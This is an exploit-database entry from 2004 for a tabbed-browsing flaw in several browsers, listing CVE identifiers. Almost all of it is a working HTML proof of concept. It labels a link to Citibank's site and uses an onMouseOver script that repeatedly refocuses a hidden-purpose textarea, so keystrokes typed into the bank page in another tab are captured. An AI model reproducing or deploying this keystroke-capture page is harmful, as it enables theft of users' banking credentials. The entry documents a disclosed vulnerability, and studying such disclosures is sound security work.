Multiple Browsers - Tabbed Browsing



EKU-ID: 8763 CVE: OSVDB-10984;CVE-2004-1381;CVE-2004-1380 OSVDB-ID:
Author: Jakob Balle Published: 2004-10-22 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


<b>Test Your Browser</b><br>
      <br>
      Open the link below in a new tab, then try to type data into form fields on the CitiBank website.<br>
      <br>
      <a href="http://www.citibank.com/" onMouseOver="setInterval('document.myform.userinput.focus();', 10);">Open this Link in New Tab</a><br>
      <br>
      <form name="myform">
        <b>Result: (Keystrokes you pressed on the CitiBank website.)</b><br>
        <textarea name="userinput" rows="3">&lt;/textarea&gt;
      </form>

// milw0rm.com [2004-10-22]